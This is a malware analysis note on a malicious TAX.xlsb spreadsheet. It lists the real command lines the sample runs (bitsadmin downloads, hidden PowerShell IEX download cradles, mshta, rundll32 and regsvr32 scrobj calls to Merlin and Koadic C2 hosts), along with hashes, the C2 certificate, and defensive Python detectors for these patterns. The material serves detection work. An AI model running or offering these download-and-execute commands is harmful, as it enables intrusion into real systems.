ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c - TAX.xlsb https://app.any.run/tasks/1c7a79e3-a201-43d3-9f4f-693d2049355c/
cmd.exe /c cd c:\&&mkdir Intel
cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat
cmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat
cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin
cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll
cmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe
cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/&&regsvr32 /s mery.dll,Run https://38.132.124.172:443/
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))
mshta http://37.72.175.188:80/home
regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj
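As an added example (not part of the original note and not the sandbox's own output), the Python below classifies process command lines against the living-off-the-land patterns visible in the run above: bitsadmin downloads, regsvr32 with a URL or scrobj, mshta with a remote URL, rundll32 handed a URL, and a hidden PowerShell download cradle. The rule names and regexes are this example's own; the sample lines are the command lines from the sandbox run, with the first one kept as a control that should not fire.

```python
import re

# Rule set written for this example (an assumption, not a published signature
# set). Each pattern captures one living-off-the-land technique that appears
# in the sandbox command lines above. Patterns are matched case-insensitively
# against the full process command line.
RULES = [
    ("bitsadmin_remote_download",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://", re.I)),
    ("regsvr32_remote_or_scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*(https?://|\bscrobj\b)", re.I)),
    ("mshta_remote",
     re.compile(r"\bmshta(\.exe)?\b\s+https?://", re.I)),
    ("rundll32_remote_url",
     re.compile(r"\brundll32(\.exe)?\b.*https?://", re.I)),
    ("powershell_download_cradle",
     re.compile(r"\bpowershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|downloadstring|\biex\b)", re.I)),
]

# Command lines taken from the sandbox run above (after stripping the stray
# leading characters); the first one is a harmless control that should not fire.
SAMPLE_COMMANDS = [
    r"cmd.exe /c cd c:\&&mkdir Intel",
    r"cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat",
    r"cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/&&regsvr32 /s mery.dll,Run https://38.132.124.172:443/",
    r"powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))",
    r"mshta http://37.72.175.188:80/home",
    r"regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj",
]


def classify_command(cmdline: str) -> list:
    """Names of every rule the command line matches, in RULES order."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan_process_log(cmdlines) -> list:
    """(cmdline, matched_rules) for each line that triggers at least one rule."""
    flagged = []
    for line in cmdlines:
        hits = classify_command(line)
        if hits:
            flagged.append((line, hits))
    return flagged


if __name__ == "__main__":
    for line, hits in scan_process_log(SAMPLE_COMMANDS):
        print(", ".join(hits), "<-", line[:70])
```

Feed `scan_process_log()` the CommandLine field of process-creation events (Sysmon event 1 or 4688 with command-line auditing) rather than the image name alone; every technique above hides behind a legitimate signed binary, so the arguments are what carry the signal.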
mer.dll is the Merlin DLL agent (Go build) - fc0bece7ca5c54b7a2032bc0cca2b65f4c20cb08b54a9acca7df037b9d30d2c4
Below is the Merlin framework C2 server; its self-signed certificate with an empty subject and issuer is an easy signature.
# openssl s_client -connect 38.132.124.172:443
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0
verify error:num=18:self signed certificate
verify return:1
depth=0
verify return:1
---
Certificate chain
0 s:
i:
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIEwDCCAqigAwIBAgIRALEpO/ZeDFiIVssqebRuwb8wDQYJKoZIhvcNAQELBQAw
ADAeFw0xOTEyMTQxODMwNThaFw0yMTEyMTQxODMwNThaMAAwggIiMA0GCSqGSIb3
DQEBAQUAA4ICDwAwggIKAoICAQDEOt7Jsc5Ey+UjNR3QXZI17jCORGPcMnDGHEfP
5DBGPmvw/DDnf8I/Jv3Bi0zeTIDprRHnO9B8uS96mBN5iObPaiaCO9z7SDYjPyYJ
KowztNd9HvAK9dr613iYhAitrFJYqKv/1oFvwqPEYp/FsXsm1+ewxioWxR0xtS8z
JvVzjal+DF4HeViyAMpUSh29P9EjwT+bSfyE8kcPd/uYzOoOL2y/NoBX9QGJto6J
XZ7vl1sLEsk9afBA99GMDbXe2ETPh5/8fDt1B11Aabj96gZNbI7kSVALM0x01no4
OlAyuHG9rVbYoDdtM1MT8oYYpO7RYlA5QW+uo4tcxYfEn4OhUDvhjCzWUmE50KmO
c3c8Ukpn4evwf5rjRonDW4oysKx13i8UCkx4xzxVPZSHxIG30JEiRFH64MOwtF74
hywd07qGPS2KSjPyy6gjRUDEkhxZIHKfnmGc0mmnkDEwtD/1HoHybGCQCQovJuy5
mT4wEV9Xjs4jwoOxBfP+xYPp4Rv0moEgIVkQFVA2t19j3baPb712arTFR2469tD5
9NErRN0M9Z/qbsZIv+pSzspl5IJme5u48RB0Xu0phoahorU3u/e48cAvpjfOk+Mx
8ymUOvQhfE9FF8ZndTzUm1va8BrMil1k1M6Mv49UNCrv6YkQ3GLY5eG7RnXB95Ej
RgEJ7wIDAQABozUwMzAOBgNVHQ8BAf8EBAMCAqQwEwYDVR0lBAwwCgYIKwYBBQUH
AwEwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEArJBO2dtW2LL4RKSr
MHTyuFaLoQY+GkqJKYv4Ww2lar+x2orOP9HBzlFXlWLlBhh/yrvRoznWLeAvzJ1h
Fb3Tl1rxErI1TJl+8uLG1aTJujz1qoibh+VdESvvdQVEW86ZmfyHCecAVu+I11ur
7gpmEY1atio3Fo0dvGsMECvYBn+lmBQD186QKTASNFD/yzY8cDqf2dN4kbMkgiLt
XAnRa9K0kgEgpHY+E6FFSjf+Ax7OAMg7PPbdM3i/hygL2xiDbDNfpGQX20gUCfVg
c1MXfGEiZiJphK7FySHH+zwbXuipM3Rnm7/qVvravmnVqMdQviqs4xg96MVwWL9R
8isZ1u5Je8DSGcXqhMl/ew9G22vJeLYPClUWAuBEYQ821gnliOEEy4xl59MMRYjn
anV9IsEUMhkoFlQA9ifEyhKQPMbVOXy7zzWU+H3AzDOzkp2YfvmgLNhazRxn9mTq
1zzyWWDOn+hjSpz7ncgQotUIQppbenz8Cv0nH7dtANPgG6Vvp9+AexQTkhZLItff
XLr4FizoRkdzkspffKio2u4HMPpw/TEiD/bC3qcOvLbau+KwJWkURSKp2PCgEJBV
9RgqkizUhitkip9MiWbqUEMHKBlS1dsRHBaOB6TeFVpJBMAQ+sJsNlax/G3YdLaj
z4VAo+VAFaOAwJ0eH4lbRR7kcA8=
-----END CERTIFICATE-----
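The check the note points at, as an added example that is neither the author's code nor Merlin's: a small DER walker in Python that pulls the issuer and subject Name out of the certificate printed above and reports whether both are empty. The certificate is the one from the openssl output; the CN=foo Name bytes are constructed here to show the non-empty branch, and the function names are this example's own.

```python
import base64

# Certificate exactly as printed by the openssl s_client session above.
MERLIN_C2_PEM = """-----BEGIN CERTIFICATE-----
MIIEwDCCAqigAwIBAgIRALEpO/ZeDFiIVssqebRuwb8wDQYJKoZIhvcNAQELBQAw
ADAeFw0xOTEyMTQxODMwNThaFw0yMTEyMTQxODMwNThaMAAwggIiMA0GCSqGSIb3
DQEBAQUAA4ICDwAwggIKAoICAQDEOt7Jsc5Ey+UjNR3QXZI17jCORGPcMnDGHEfP
5DBGPmvw/DDnf8I/Jv3Bi0zeTIDprRHnO9B8uS96mBN5iObPaiaCO9z7SDYjPyYJ
KowztNd9HvAK9dr613iYhAitrFJYqKv/1oFvwqPEYp/FsXsm1+ewxioWxR0xtS8z
JvVzjal+DF4HeViyAMpUSh29P9EjwT+bSfyE8kcPd/uYzOoOL2y/NoBX9QGJto6J
XZ7vl1sLEsk9afBA99GMDbXe2ETPh5/8fDt1B11Aabj96gZNbI7kSVALM0x01no4
OlAyuHG9rVbYoDdtM1MT8oYYpO7RYlA5QW+uo4tcxYfEn4OhUDvhjCzWUmE50KmO
c3c8Ukpn4evwf5rjRonDW4oysKx13i8UCkx4xzxVPZSHxIG30JEiRFH64MOwtF74
hywd07qGPS2KSjPyy6gjRUDEkhxZIHKfnmGc0mmnkDEwtD/1HoHybGCQCQovJuy5
mT4wEV9Xjs4jwoOxBfP+xYPp4Rv0moEgIVkQFVA2t19j3baPb712arTFR2469tD5
9NErRN0M9Z/qbsZIv+pSzspl5IJme5u48RB0Xu0phoahorU3u/e48cAvpjfOk+Mx
8ymUOvQhfE9FF8ZndTzUm1va8BrMil1k1M6Mv49UNCrv6YkQ3GLY5eG7RnXB95Ej
RgEJ7wIDAQABozUwMzAOBgNVHQ8BAf8EBAMCAqQwEwYDVR0lBAwwCgYIKwYBBQUH
AwEwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEArJBO2dtW2LL4RKSr
MHTyuFaLoQY+GkqJKYv4Ww2lar+x2orOP9HBzlFXlWLlBhh/yrvRoznWLeAvzJ1h
Fb3Tl1rxErI1TJl+8uLG1aTJujz1qoibh+VdESvvdQVEW86ZmfyHCecAVu+I11ur
7gpmEY1atio3Fo0dvGsMECvYBn+lmBQD186QKTASNFD/yzY8cDqf2dN4kbMkgiLt
XAnRa9K0kgEgpHY+E6FFSjf+Ax7OAMg7PPbdM3i/hygL2xiDbDNfpGQX20gUCfVg
c1MXfGEiZiJphK7FySHH+zwbXuipM3Rnm7/qVvravmnVqMdQviqs4xg96MVwWL9R
8isZ1u5Je8DSGcXqhMl/ew9G22vJeLYPClUWAuBEYQ821gnliOEEy4xl59MMRYjn
anV9IsEUMhkoFlQA9ifEyhKQPMbVOXy7zzWU+H3AzDOzkp2YfvmgLNhazRxn9mTq
1zzyWWDOn+hjSpz7ncgQotUIQppbenz8Cv0nH7dtANPgG6Vvp9+AexQTkhZLItff
XLr4FizoRkdzkspffKio2u4HMPpw/TEiD/bC3qcOvLbau+KwJWkURSKp2PCgEJBV
9RgqkizUhitkip9MiWbqUEMHKBlS1dsRHBaOB6TeFVpJBMAQ+sJsNlax/G3YdLaj
z4VAo+VAFaOAwJ0eH4lbRR7kcA8=
-----END CERTIFICATE-----"""

# Constructed sample (not from the page): the contents of a Name holding one
# RDN, CN=foo, used to exercise the non-empty branch of count_rdns().
#   SET { SEQUENCE { OID 2.5.4.3 (commonName), UTF8String "foo" } }
CONSTRUCTED_CN_FOO_NAME = bytes.fromhex("310c300a06035504030c03666f6f")


def pem_to_der(pem: str) -> bytes:
    body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
    return base64.b64decode(body)


def read_tlv(buf: bytes, pos: int):
    """Decode one DER TLV header at buf[pos]; return (tag, value_start, value_end)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: next N bytes hold the length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, pos, pos + length


def cert_names(der: bytes):
    """Return the raw contents of the issuer and subject Name SEQUENCEs."""
    tag, pos, _ = read_tlv(der, 0)            # Certificate ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    tag, pos, _ = read_tlv(der, pos)          # tbsCertificate ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("tbsCertificate is not a SEQUENCE")
    tag, _, end = read_tlv(der, pos)
    if tag == 0xA0:                           # optional [0] EXPLICIT version
        pos = end
    pos = read_tlv(der, pos)[2]               # serialNumber INTEGER
    pos = read_tlv(der, pos)[2]               # signature AlgorithmIdentifier
    _, start, pos = read_tlv(der, pos)        # issuer Name
    issuer = der[start:pos]
    pos = read_tlv(der, pos)[2]               # validity
    _, start, pos = read_tlv(der, pos)        # subject Name
    subject = der[start:pos]
    return issuer, subject


def count_rdns(name: bytes) -> int:
    """Count the RelativeDistinguishedName SETs inside a Name's contents."""
    n, pos = 0, 0
    while pos < len(name):
        tag, _, pos = read_tlv(name, pos)
        if tag != 0x31:
            raise ValueError("Name contents must be a sequence of SETs")
        n += 1
    return n


def analyze_cert(pem: str) -> dict:
    """Report RDN counts and flag the empty-subject/empty-issuer pattern."""
    issuer, subject = cert_names(pem_to_der(pem))
    return {
        "issuer_rdns": count_rdns(issuer),
        "subject_rdns": count_rdns(subject),
        "empty_names": issuer == b"" and subject == b"",
    }


if __name__ == "__main__":
    print(analyze_cert(MERLIN_C2_PEM))
```

For a live check, `ssl.get_server_certificate((host, port))` from the standard library returns the leaf certificate as PEM and can be passed straight to `analyze_cert()`; at network scale the same condition is a filter on empty `certificate.subject` and `certificate.issuer` fields in Zeek's x509.log.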
hxxp://37.72.175[.]188:443/index is the Koadic backdoor framework - script-based agents with a Python server.
home - 276e409e3371f1b3d905737be03c99ed5b3b4519a03db5aec21b609d488ae06e
index - d369d50b3447d354bc6d69ffb45c2e57dc149ed58946bcfe4cf567806c1676b3
Both are Koadic stagers from data/stager/stdlib.js, with different session IDs for the hand-off:
hxxp://37.72.175[.]188:80/home?4IZ9S56AA4=e92f3574b16a4a0da0f15b3feca6f16f;N6URWPF5YH=
hxxp://37.72.175[.]188:443/index?6S2YBE0VOY=a9136a756c1e4ab39a0d737c0dbec493;KWYS8DF1UJ=